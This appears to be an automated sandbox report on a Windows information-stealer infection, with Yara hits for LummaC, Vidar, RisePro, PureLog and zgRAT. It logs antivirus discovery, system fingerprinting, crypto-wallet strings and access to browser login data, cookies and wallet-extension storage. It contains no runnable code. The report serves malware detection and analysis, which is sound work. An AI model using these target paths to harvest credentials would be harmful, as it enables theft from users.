Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Queries volume information: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe VolumeInformation
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\MSIUpdaterV168_b055341c05e33d6c2334ce6d41cea915\MSIUpdaterV168.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\zyJWi2vy29.exe

Code function: 0_2_00327BC3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00327BC3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 20_2_004DFF00 CreateDirectoryA,FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,GetLastError,GetLastError,CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,

20_2_004DFF00

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 20_2_0044D130 GetTimeZoneInformation,

20_2_0044D130

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 20_2_00545050 GetLastError,GetVersionExA,FormatMessageW,LocalFree,FormatMessageA,

20_2_00545050

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.5.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000131A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000026.00000002.2005073525.0000000003648000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.5.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 46.0.MSIUpdaterV168.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002E.00000000.1886815779.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, type: DROPPED

Yara detected RisePro Stealer

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8188, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Wb7RPsmWU0j98XyD1Ncm8BU.zip, type: DROPPED

Yara detected Vidar stealer

Source: Yara match	File source: 34.2.MSIUpdaterV168.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.MSIUpdaterV168.exe.4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.8x9h3ctqkpfTu0sNF0X2.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000002.1988085776.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2029351588.00000000004F4000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1886573131.0000000000E64000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8x9h3ctqkpfTu0sNF0X2.exe PID: 7268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7236, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSIUpdaterV168.exe PID: 2504, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSIUpdaterV168.exe PID: 7744, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 46.0.MSIUpdaterV168.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\AdobeUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\AdobeUpdaterV168.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\meta2806[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000026.00000002.2004278407.0000000001369000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: RegAsm.exe, 00000026.00000002.2004278407.0000000001369000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: RegAsm.exe, 00000026.00000002.2004278407.0000000001369000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegAsm.exe, 00000026.00000002.2004552788.00000000013BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: a%\\Exodus\\exod:
Source: RegAsm.exe, 00000018.00000002.2939946030.00000000004DD000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Exodus Web3 Wallet
Source: RegAsm.exe, 00000026.00000002.2001216183.000000000131A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: RegAsm.exe, 00000026.00000002.2004552788.00000000013BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: MSIUpdaterV168.exe, 0000002E.00000000.1886815779.0000000000F52000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
